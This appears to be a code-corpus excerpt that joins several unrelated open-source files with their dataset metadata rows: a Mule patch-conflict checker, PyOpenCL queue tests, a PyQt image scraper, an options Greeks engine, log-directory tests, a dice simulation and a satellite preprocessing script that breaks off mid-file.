os.chdir(git_source)
call(["git", "fetch", "--tags"])
p = Popen(["git", "diff", "--name-only", v_origin + ".." + v_destination], stdout=PIPE)
output, _ = p.communicate()
files = [file.decode() for file in output.split(b"\n")]
return set(map(lambda file: file.split(UTILITY_PATH)[-1], filter(lambda file: UTILITY_PATH in file, files)))
finally:
os.chdir(working_dir)
class PatchDiffer:
def __init__(self, mule_ce_path, mule_ee_path):
self.ce = mule_ce_path
self.ee = mule_ee_path
@staticmethod
def conflicts(files, diff_files):
return list(set(files) & diff_files)
def is_applicable(self, changed_classes, origin_version, destination_version):
ce_files = map(add_java, filter_starting_with(changed_classes, "org"))
ee_files = map(add_java, filter_starting_with(changed_classes, "com"))
ce_diff = git_diff_files(self.ce, origin_version, destination_version)
ee_diff = git_diff_files(self.ee, origin_version, destination_version)
total_conflicts = self.conflicts(ce_files, ce_diff) + self.conflicts(ee_files, ee_diff)
self.last_conflicts = total_conflicts
return len(self.last_conflicts) == 0
def get_conflicts(self):
assert hasattr(self, "last_conflicts")
return self.last_conflicts
def print_usage():
print("Usage: ")
print("python " + sys.argv[0] + " <patch-file> <ce-git-folder> <ee-git-folder> <destination-version> (<origin-version>)")
print("If the origin version is not specified, it will be inferred from the Patch filename. Example:")
print("\tpython " + sys.argv[0] + " SE-2618-3.7.3.jar ../Git/mule-ce ../Git/mule-ee 3.7.4")
def main(args):
if len(args) < 4 or len(args) > 5:
print_usage()
sys.exit(1)
if len(args) == 4:
version = os.path.basename(args[0]).replace(".jar", "").split("-")[-1]
args.append(version)
patch_source, ce_path, ee_path, v_dest, v_org = args
v_dest = PREFIX_BRANCH + v_dest
v_org = PREFIX_BRANCH + v_org
p = PatchDiffer(ce_path, ee_path)
classes = patch_utils.modified_classes(patch_source)
if p.is_applicable(classes, v_org, v_dest):
print("The patch " + args[0] + " is applicable to the " + args[3] + " version")
else:
print("The patch " + args[0] + " has conflicts in files:")
for file in p.get_conflicts():
print("\t- " + file)
if __name__ == "__main__":
main(sys.argv[1:])
| mit | 2,717,768,461,241,766,000 | 34.864198 | 125 | 0.619621 | false |
apatriciu/OpenStackOpenCL | ServerSidePythonOpenCLInterface/tests/testOpenCLInterfaceQueueObjects.py | 1 | 5499 | import unittest
import PyOpenCLInterface
import sys
class LaptopResources:
listDevicesIDs = [0]
dictProperties = {}
invalidQueueID = 1
device_type = "GPU"
class TestQueues(unittest.TestCase):
# define the expected response
testResources = LaptopResources()
def setUp(self):
retErr = PyOpenCLInterface.Initialize(self.testResources.device_type)
self.assertEqual(retErr, 0)
def tearDown(self):
pass
def testCreateQueue(self):
"""Creates a new context"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
# create mem queue
queueCreateFlags = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueCreateFlags)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
queueProperty, retErr = PyOpenCLInterface.GetQueueProperties(queueID)
self.assertEqual(queueProperty['id'], queueID)
self.assertEqual(queueProperty['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queueProperty['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue(queueID)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught:", sys.exc_info()[0]
def testGetUnknownObjectProperties(self):
"""Tries to retrieve the properties of an inexistent device"""
queueID = 0
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.GetQueueProperties, queueID)
def testRetainAndRelease(self):
"""
Create and release a context
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queueID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queueID])
retErr = PyOpenCLInterface.ReleaseQueue( queueID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
# try to release again
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.ReleaseQueue, queueID)
self.assertRaises(PyOpenCLInterface.error, PyOpenCLInterface.RetainQueue, queueID)
try:
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
def testMultipleQueues(self):
"""
Creates multiple queues
"""
try:
contextID, retErr = PyOpenCLInterface.CreateContext(self.testResources.listDevicesIDs, self.testResources.dictProperties)
self.assertEqual(retErr, 0)
queueAttribs = []
queue1ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID])
queueAttribs = []
queue2ID, retErr = PyOpenCLInterface.CreateQueue(contextID, self.testResources.listDevicesIDs[0], queueAttribs)
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue1ID, queue2ID])
queue1Property, retErr = PyOpenCLInterface.GetQueueProperties(queue1ID)
self.assertEqual(queue1Property['id'], queue1ID)
self.assertEqual(queue1Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue1Property['Context'], contextID)
queue2Property, retErr = PyOpenCLInterface.GetQueueProperties(queue2ID)
self.assertEqual(queue2Property['id'], queue2ID)
self.assertEqual(queue2Property['Device'], self.testResources.listDevicesIDs[0])
self.assertEqual(queue2Property['Context'], contextID)
retErr = PyOpenCLInterface.ReleaseQueue( queue1ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [queue2ID])
retErr = PyOpenCLInterface.ReleaseQueue( queue2ID )
self.assertEqual(retErr, 0)
listQueues = PyOpenCLInterface.ListQueues()
self.assertEqual(listQueues, [])
retErr = PyOpenCLInterface.ReleaseContext(contextID)
self.assertEqual(retErr, 0)
except:
print "Exception caught: ", sys.exc_info()[0]
self.assertEqual(1, 0)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | -9,009,627,036,438,824,000 | 44.446281 | 133 | 0.652846 | false |
codeAB/music-player | singer.py | 1 | 4368 | #!/usr/bin/python3
# -*- coding: utf8 -*-
"""
抓取歌手头像
"""
import sys
import os
import urllib.parse
import urllib.request
import re
from PyQt5.QtWidgets import (
QApplication, QWidget, QPushButton, QLineEdit, QLabel)
from PyQt5.QtWebKitWidgets import QWebPage, QWebView
from PyQt5.QtCore import Qt, QUrl, pyqtSlot,QTimer
from PyQt5.QtGui import ( QCursor)
class Singer(QWidget):
# def __init__(self,singer,music):
def __init__(self,singer):
super().__init__()
# 窗口居于所有窗口的顶端
self.setWindowFlags(Qt.WindowOverridesSystemGestures)
#针对X11
self.setWindowFlags(Qt.X11BypassWindowManagerHint)
self.singer = singer
# self.music = music
self.initUI()
self.show()
def initUI(self):
self.w= QWidget(self)
self.setGeometry(300,100,1000,600)
l = QLabel("实用说明,搜索需要的图片,在搜索结果页面点击选择的图片即可设置。。双击此处退出",self)
l.move(0,0)
self.web = QWebView(self)
self.web.loadFinished.connect(self.test)
self.web.page().setLinkDelegationPolicy(QWebPage.DelegateAllLinks)
self.web.page().linkClicked.connect(self.linkClicked)
self.web.setGeometry(0, 30, 1000, 570)
# self.btn = QPushButton("测试",self);
# self.btn.clicked.connect(self.test)
# self.btn.move(300,550)
self.web.load(QUrl("http://image.baidu.com/"))
def test(self):
print("jiazaijieshu")
frame = self.web.page().currentFrame()
searchinput = frame.findFirstElement('#kw')
d = frame.findFirstElement('.img_area_container_box')
d.removeAllChildren()
searchinput.setAttribute("value",self.singer)
# searchinput.setAttribute("readonly","readonly")
def linkClicked(self,url):
# print(url.toString())
url = url.toString()
pattern = re.compile(r'&word=(.*?)&')
s = pattern.findall(url)
k = {'word': s[0]}
kv = urllib.parse.urlencode(k)
url = url.replace("word="+s[0], kv)
res = urllib.request.urlopen(url).read().decode("utf8")
pattern = re.compile(r'currentImg(.*)<div>',re.S)
s = pattern.findall(res)
print(s)
src="http://img3.imgtn.bdimg.com/it/u=673176467,634723054&fm=21&gp=0.jpg"
pattern = re.compile(r'src="(.*?)"')
s = pattern.findall(s[0])
img_url = s[0].replace("&","&")
local = os.path.join('./cache/', self.singer+'.jpg')
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0'
req = urllib.request.Request(img_url)
req.add_header('Referer', 'http://music.baidu.com/?from=new_mp3')
req.add_header('User-Agent', user_agent)
f = urllib.request.urlopen(req)
data = f.read()
with open(local, "wb") as code:
code.write(data)
# self.music.picture.setStyleSheet("QLabel{ background:#9B0069;border-image:url("+local+")}")
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drag_flag = True
# if hasattr(self.window, 'widget1'):
# self.begin_position2 = event.globalPos() - \
# self.window.widget1.pos()
self.begin_position = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
def mouseMoveEvent(self, QMouseEvent):
if Qt.LeftButton and self.drag_flag:
# if hasattr(self.window, 'widget1'):
# self.window.widget1.move(
# QMouseEvent.globalPos() - self.begin_position2)
# self.window.move(QMouseEvent.globalPos() - self.begin_position)
# else:
self.move(QMouseEvent.globalPos() - self.begin_position)
QMouseEvent.accept()
def mouseReleaseEvent(self, QMouseEvent):
self.drag_flag = False
self.setCursor(QCursor(Qt.ArrowCursor))
# def leaveEvent(self,QMouseEvent):
# self.close()
def mouseDoubleClickEvent(self,e):
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
s = Singer("张杰")
sys.exit(app.exec_())
| gpl-3.0 | 6,152,910,160,387,240,000 | 34.090909 | 105 | 0.593971 | false |
tpoy0099/option_calculator | engine_algorithm/calculate_engine.py | 1 | 12864 | #coding=utf8
import threading as THD
import datetime as DT
import engine_algorithm.data_analyser as ANALYSER
import engine_algorithm.database_adaptor as DADAPTOR
from utility.data_handler import TableHandler
from marketdata.marketdata_adaptor import MarketdataAdaptor
from utility.messager import MessageQueue
from utility.self_defined_types import MessageTypes, PassedIndexType, XAxisType
################################################################
class Engine:
etf_code = '510050.SH'
ETF_QUOTE_HEADERS = ('last_price', 'open_price', 'high_price',
'low_price', 'update_time')
STATISTICS_HEADERS = ('implied_vol', 'delta', 'gamma', 'vega',
'theta', 'intrnic', 'time_value')
#-------------------------------------------------------------
def __init__(self, gui):
self.gui = gui
#original position table
self.ori_positions = None
#etf quote
self.etf = TableHandler()
self.etf.reset(1, Engine.ETF_QUOTE_HEADERS, -1)
#marketdata service
self.md = MarketdataAdaptor()
#database service
self.dp = DADAPTOR.DataProxy()
self.__reloadPositions()
#flow control
self.last_sync_time = DT.datetime.now()
#gui communication
self.msg = MessageQueue()
self.msg_event = THD.Event()
self.msg_thread = THD.Thread(target=self.__handleMessage)
self.msg_thread.start()
return
def quit(self):
self.__pushMsg(MessageTypes.QUIT)
self.msg_thread.join()
#-------------------------------------------------------------
def qryUpdateData(self):
self.__pushMsg(MessageTypes.UPDATE_QUOTE_DATA)
def qryEtfQuoteFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_ETF_QUOTE_FEED)
def qryTableDataFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_TABLE_FEED)
def qryPositionBasedata(self):
self.__pushMsg(MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED)
def qryCalGreeksSensibilityByGroup(self, option_group_id, stock_group_id, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_group_id, stock_group_id,
PassedIndexType.GROUP, x_axis_type))
def qryCalGreeksSensibilityByPosition(self, option_rows, stock_rows, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_rows, stock_rows,
PassedIndexType.ROW, x_axis_type))
def qryExerciseCurveByGroup(self, option_group_id, stock_group_id):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_group_id, stock_group_id, PassedIndexType.GROUP))
def qryExerciseCurveByPosition(self, option_rows, stock_rows):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_rows, stock_rows, PassedIndexType.ROW))
def qryReloadPositions(self, positions_data=None):
self.__pushMsg(MessageTypes.GUI_QUERY_RELOAD_POSITIONS, positions_data)
def qrySavePositionCsv(self):
self.__pushMsg(MessageTypes.SAVE_POSITION_CSV)
def __pushMsg(self, msg_type, content=None):
self.msg.pushMsg(msg_type, content)
self.msg_event.set()
def __handleMessage(self):
try:
while True:
msg = self.msg.getMsg()
if msg is None:
self.msg_event.wait()
self.msg_event.clear()
#update marketdata order by user
elif msg.type is MessageTypes.UPDATE_QUOTE_DATA:
self.__updateData()
#qry engine provide table data
elif msg.type is MessageTypes.GUI_QUERY_TABLE_FEED:
self.__feedDataTable()
#qry etf data
elif msg.type is MessageTypes.GUI_QUERY_ETF_QUOTE_FEED:
self.__feedEtfQuote()
#qry position base data for editor
elif msg.type is MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED:
self.__feedPositionBaseData()
#cal greeks sensibility
elif msg.type is MessageTypes.GUI_QUERY_CAL_SENSI:
self.__calGreekSensibility(msg.content[0], msg.content[1],
msg.content[2], msg.content[3])
elif msg.type is MessageTypes.GUI_QUERY_EXERCISE_CURVE:
self.__calOptionExerciseProfitCurve(msg.content[0], msg.content[1],
msg.content[2])
elif msg.type is MessageTypes.GUI_QUERY_RELOAD_POSITIONS:
self.__reloadPositions(msg.content)
elif msg.type is MessageTypes.SAVE_POSITION_CSV:
self.__savePosition2Csv()
elif msg.type is MessageTypes.QUIT:
break
except Exception as err:
self.gui.onEngineError(err)
#thread terminate
return
#-----------------------------------------------------------
#positions should be a instance of TableHandler
def __reloadPositions(self, positions=None):
if type(positions) is TableHandler:
pos = positions.toDataFrame()
else:
pos, err = DADAPTOR.loadPositionCsv()
if not err is None:
raise Exception('load position csv failed ...')
#save pos
self.ori_positions = pos
#separate data
option_rows = list()
stock_rows = list()
for r in range(0, pos.shape[0]):
code = pos['code'].iat[r]
contract_type = self.md.getContractType(code)
if contract_type in ['call', 'put']:
option_rows.append(r)
else:
stock_rows.append(r)
option_df = pos.iloc[option_rows, :]
stock_df = pos.iloc[stock_rows, :]
self.dp.initialize(option_df, stock_df)
self.__updateData(True)
return
def __savePosition2Csv(self):
DADAPTOR.savePositionCsv(self.ori_positions)
return
def __updateData(self, update_baseinfo=False):
self.last_sync_time = DT.datetime.now()
#stock
self.__updateEtfData()
stk = self.dp.getStockData()
for r in range(0, stk.rows()):
self.__updateStockRow(r)
#option
opt = self.dp.getOptionData()
for r in range(0, opt.rows()):
if update_baseinfo:
self.__updateRowBaseInfos(r)
self.__updateOptionRow(r)
#update database
self.dp.updateData()
return
#update etf price data
def __updateEtfData(self):
etf_last_price = self.md.getLastprice(Engine.etf_code)
self.etf.setByHeader(0, 'last_price', etf_last_price)
self.etf.setByHeader(0, 'update_time', self.md.getLastUpdateTime(Engine.etf_code))
if not self.etf.getByHeader(0, 'open_price') < 0:
self.etf.setByHeader(0, 'high_price', max(etf_last_price, self.etf.getByHeader(0, 'high_price')))
self.etf.setByHeader(0, 'low_price', min(etf_last_price, self.etf.getByHeader(0, 'low_price')))
else:
O = self.md.getDailyOpen(Engine.etf_code)
H = self.md.getDailyHigh(Engine.etf_code)
L = self.md.getDailyLow(Engine.etf_code)
if O and H and L:
self.etf.setByHeader(0, 'open_price', O)
self.etf.setByHeader(0, 'high_price', H)
self.etf.setByHeader(0, 'low_price', L)
return
def __updateStockRow(self, irow):
pos = self.dp.getStockData()
last_price = self.etf.getByHeader(0, 'last_price')
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getStockMultiplier())
pos.setByHeader(irow, 'last_price', last_price)
pos.setByHeader(irow, 'float_profit', float_profit)
return
#update basic_infos like expiry, strike_price etc.
def __updateRowBaseInfos(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
pos.setByHeader(irow, 'type', self.md.getContractType(code))
pos.setByHeader(irow, 'strike', self.md.getStrikePrice(code))
pos.setByHeader(irow, 'expiry', self.md.getExerciseDate(code))
pos.setByHeader(irow, 'left_days', self.md.getDaysBeforeExercise(code))
return
#update
def __updateOptionRow(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
last_price = self.md.getLastprice(code)
pos.setByHeader(irow, 'last_price', last_price)
###################################
S = self.etf.getByHeader(0, 'last_price')
K = pos.getByHeader(irow, 'strike')
T = pos.getByHeader(irow, 'left_days')
opt_type = pos.getByHeader(irow, 'type')
#greeks
stat = None
if opt_type.lower() == 'call':
stat = ANALYSER.getStatistics(S, K, T, last_price, True)
elif opt_type.lower() == 'put':
stat = ANALYSER.getStatistics(S, K, T, last_price, False)
if stat:
for header in Engine.STATISTICS_HEADERS:
pos.setByHeader(irow, header, stat[header])
#trade state
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getOptionMultiplier())
pos.setByHeader(irow, 'float_profit', float_profit)
return
def __feedDataTable(self):
opt_data = TableHandler()
opt_data.copyDataframe(self.dp.getOptionData().getDataFrame())
stk_data = TableHandler()
stk_data.copyDataframe(self.dp.getStockData().getDataFrame())
ptf_data = TableHandler()
ptf_data.copyDataframe(self.dp.getPortfolioData().getDataFrame())
self.gui.onRepTableFeed(opt_data, stk_data, ptf_data)
return
def __feedEtfQuote(self):
snap_etf = TableHandler()
snap_etf.copy(self.etf)
self.gui.onRepEtfQuoteFeed(snap_etf)
return
def __feedPositionBaseData(self):
tdata = TableHandler()
tdata.copyDataframe(self.ori_positions)
self.gui.onRepPositionBasedataFeed(tdata)
return
def __calGreekSensibility(self, option_idx, stock_idx, idx_type, x_axis_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
if x_axis_type is XAxisType.PRICE:
rtn = ANALYSER.getGreeksSensibilityByPrice(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.VOLATILITY:
rtn = ANALYSER.getGreeksSensibilityByVolatility(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.TIME:
rtn = ANALYSER.getGreeksSensibilityByTime(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
else:
return
self.gui.onRepCalGreeksSensibility(rtn, x_axis_type)
return
def __calOptionExerciseProfitCurve(self, option_idx, stock_idx, idx_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
rtn = ANALYSER.getExerciseProfitCurve(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
self.gui.onRepCalExerciseCurve(rtn)
return
| gpl-2.0 | -3,853,331,277,950,889,500 | 40.230769 | 109 | 0.569419 | false |
seecr/meresco-components | test/log/directorylogtest.py | 1 | 5323 | ## begin license ##
#
# "Meresco Components" are components to build searchengines, repositories
# and archives, based on "Meresco Core".
#
# Copyright (C) 2014-2015, 2018, 2020 Seecr (Seek You Too B.V.) https://seecr.nl
# Copyright (C) 2014 Stichting Bibliotheek.nl (BNL) http://www.bibliotheek.nl
# Copyright (C) 2014, 2020 Stichting Kennisnet https://www.kennisnet.nl
# Copyright (C) 2015 Koninklijke Bibliotheek (KB) http://www.kb.nl
# Copyright (C) 2020 Data Archiving and Network Services https://dans.knaw.nl
# Copyright (C) 2020 SURF https://www.surf.nl
# Copyright (C) 2020 The Netherlands Institute for Sound and Vision https://beeldengeluid.nl
#
# This file is part of "Meresco Components"
#
# "Meresco Components" is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# "Meresco Components" is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with "Meresco Components"; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
## end license ##
from seecr.test import SeecrTestCase
from meresco.components.log import DirectoryLog
from os import listdir
from os.path import join, isdir
from meresco.components.log.directorylog import NR_OF_FILES_KEPT
class DirectoryLogTest(SeecrTestCase):
def testMinimalLog(self):
log = DirectoryLog(self.tempdir)
log.log(
timestamp=1257161136.0
)
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('2009-11-02T11:25:36Z - - - - - \n', fp.read())
def testAppendToLog(self):
with open(join(self.tempdir, '2009-11-02-query.log'), 'w') as f:
f.write('line0\n')
log = DirectoryLog(self.tempdir)
log.log(**DEFAULT_KWARGS())
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('line0\n2009-11-02T11:25:36Z 11.22.33.44 1.1K 1.300s 42hits /path query=arguments\n', fp.read())
def testNewDayNewLogFile(self):
kwargs = DEFAULT_KWARGS()
kwargs['timestamp'] = 1257161136.0
log = DirectoryLog(self.tempdir)
log.log(**kwargs)
kwargs['timestamp'] += 24 * 60 * 60
log.log(**kwargs)
self.assertEqual(['2009-11-02-query.log', '2009-11-03-query.log'], sorted(listdir(self.tempdir)))
with open(join(self.tempdir, '2009-11-03-query.log')) as fp:
self.assertEqual('2009-11-03T11:25:36Z 11.22.33.44 1.1K 1.300s 42hits /path query=arguments\n', fp.read())
def testLogDirCreated(self):
logDir = join(self.tempdir, 'amihere')
self.assertFalse(isdir(logDir))
DirectoryLog(logDir)
self.assertTrue(isdir(logDir))
def testSetExtension(self):
log = DirectoryLog(self.tempdir, extension='-the-end.log')
log.log(**DEFAULT_KWARGS())
self.assertEqual(['2009-11-02-the-end.log'], listdir(self.tempdir))
def testRemoveOldLogs(self):
nrOfFilesKept = 5
kwargs = DEFAULT_KWARGS()
kwargs['timestamp'] = 1257161136.0
for filename in ("%03d-the-end.log" % r for r in range(10)):
open(join(self.tempdir, filename), 'w').close()
for filename in ("%03d-the-other-end.log" % r for r in range(10)):
open(join(self.tempdir, filename), 'w').close()
filesBefore = listdir(self.tempdir)
log = DirectoryLog(self.tempdir, extension='-the-end.log', nrOfFilesKept=nrOfFilesKept)
log.log(**kwargs)
filesAfter = listdir(self.tempdir)
self.assertFalse('000-the-end.log' in filesAfter)
self.assertTrue('000-the-other-end.log' in filesAfter)
filesBefore = listdir(self.tempdir)
kwargs['timestamp'] += 3600*24
log.log(**kwargs)
filesAfter = listdir(self.tempdir)
self.assertFalse('001' in filesAfter)
self.assertEqual(len(filesAfter), len(filesBefore))
with open(join(self.tempdir, '015-the-end.log'), 'w') as fp: pass
with open(join(self.tempdir, '016-the-end.log'), 'w') as fp: pass
kwargs['timestamp'] += 3600*24
log.log(**kwargs)
self.assertEqual(5+10, len(listdir(self.tempdir)))
def testAsStream(self):
times = [1257161136.0]
d = DirectoryLog(self.tempdir)
d._now = lambda: times[0]
d.write('my line\n')
d.flush()
self.assertEqual(['2009-11-02-query.log'], listdir(self.tempdir))
with open(join(self.tempdir, '2009-11-02-query.log')) as fp:
self.assertEqual('my line\n', fp.read())
DEFAULT_KWARGS = lambda: dict(
timestamp=1257161136.0,
size=1.1,
path='/path',
ipAddress='11.22.33.44',
duration=1.3,
queryArguments='query=arguments',
numberOfRecords=42,
)
| gpl-2.0 | -5,416,497,279,097,028,000 | 40.913386 | 125 | 0.658463 | false |
JuanScaFranTru/Simulation | Practico4/ej3.py | 1 | 1227 | from random import random
def udiscreta(a, b):
u = random()
return int(u * (b - a + 1)) + a
def experiment():
"""
Se lanzan simultáneamente un par de dados legales y se anota el resultado
de la suma de ambos. El proceso se repite hasta que todos los resultados
posibles: 2,3,...,12 hayan aparecido al menos una vez.
"""
# Usamos un set para guardar los resultados
throws = set()
iterations = 0
while len(throws) != 11:
# Tiramos los dados. Los valores se distribuyen de manera uniforme en
# el intervalo [1,6] (los valores posible de un dado)
die1 = udiscreta(1, 6)
die2 = udiscreta(1, 6)
# Agregamos el resultado de la suma del lanzamiento
throws.add(die1 + die2)
# Una iteración más ha ocurrido
iterations += 1
return iterations
def ej3(n):
for i in range(4):
prob1 = 0
prob2 = 0
for j in range(n):
prob1 += experiment()
prob2 += experiment() ** 2
mean = prob1 / n
mean2 = prob2 / n
sigma = (mean2 - mean ** 2) ** (1/2)
print("N = ", n, "Media = ", mean, "Desviación estandar =", sigma)
n = n * 10
ej3(100)
| gpl-3.0 | 4,595,522,826,287,092,700 | 25.586957 | 77 | 0.568275 | false |
GFZ-Centre-for-Early-Warning/REM_satex_plugin | run_as_script.py | 1 | 17723 | class SatEx:
'''
Class for running SatEx as script
'''
def __init__(self,config):
import os
self.config = config
#setup subrpocess differently for windows
self.startupinfo = None
if os.name == 'nt':
self.startupinfo = subprocess.STARTUPINFO()
self.startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
def updatePForm(self):
#get user edits
self.ls_path = self.config['ls_path']+'/'
self.roi = self.config['roi']
self.out_fname = self.config['out_fname1']
if (self.ls_path =='/' or self.roi == '' or self.out_fname == ''):
return False
else:
return True
def updateCForm(self):
#get user edits
self.raster = self.config['raster']
self.in_train = self.config['in_train']
self.out_fname = self.config['out_fname']
self.label = self.config['label']
self.sieve = self.config['sieve']
self.external = self.config['external']
#in case an external SVM is provided the testing is optional
if self.external:
if (self.raster =='' or self.out_fname == '' or self.sieve == ''):
return False
else:
return True
else:
if (self.raster =='' or self.in_train == '' or self.out_fname == '' or self.label == '' or self.sieve == ''):
return False
else:
return True
def select_input_raster(self):
dirname = PyQt4.QtGui.QFileDialog.getExistingDirectory(self.Pdlg, "Select input directory ","",PyQt4.QtGui.QFileDialog.ShowDirsOnly)
def run_preprocessing(self):
"""Run method that performs all the real work"""
valid_input=self.updatePForm()
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
#find the number of different L8 scenes
#by reading all TIFs splitting off '_Bxy.TIF' and getting unique strings
e = 'Unspecified error'
#instantiate utilities function
ut = utils.utils()
try:
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
try:
#delete any old tmp files that might be in the directory from a killed task
old=ut.delete_tmps(self.ls_path)
#if old > 0: qgis.core.QgsMessageLog.logMessage('Old *satexTMP* files were present. They were deleted.')
if old > 0: print 'Old *satexTMP* files were present. They were deleted.'
except:
e = str('Could not delete old *satexTMP* files. Function utils.delete_tmps.')
raise Exception
try:
pattern = '*.TIF'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
if len(scenes)==0:
pattern = '*.tif'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
1/len(scenes)
except ZeroDivisionError:
e = str('Found no scene in {}'.format(self.ls_path))
raise Exception
else:
print str('Found {} scene(s) in {}'.format(len(scenes),self.ls_path))
#check shapefile roi
try:
driver = ogr.GetDriverByName('ESRI Shapefile')
dataSource = driver.Open(self.roi,0)
layer = dataSource.GetLayer()
print str('Using {} as ROI'.format(self.roi))
except AttributeError:
e = str('Could not open {}'.format(self.roi))
raise Exception
#loop through all scenes
out_files = []
for scene in scenes:
#find all bands for scene exclude quality band BQA and B8
try:
bands = [b for b in ut.findFiles(self.ls_path,scene+'*_B'+pattern) if '_BQA' not in b]
bands = [b for b in bands if '_B8' not in b]
#in case of multiple scenes (and not first scene is processed) check if nr of bands are equal
try:
#only if more than one scene and at least second scene
nr_bands
except:
if len(bands)==0:
e = str('Found no bands for scene {}.'.format(scene))
raise Exception
else:
#store number of bands for potential additonal scenes
nr_bands = len(bands)
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(nr_bands,scene))
else:
if len(bands)!=nr_bands:
e = str('Found {} instead of {} bands (excluding B8 and BQA) for scene {}. If multiple scenes are provided in the input directory, ensure they have equal bands!'.format(len(bands),nr_bands,scene))
else:
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(len(bands),scene))
except:
raise Exception
#Check if ROI and scene overlap
try:
error,overlap = ut.vector_raster_overlap(self.roi,self.ls_path+bands[0])
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function with {} and {}'.format(self.roi,bands[0]))
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
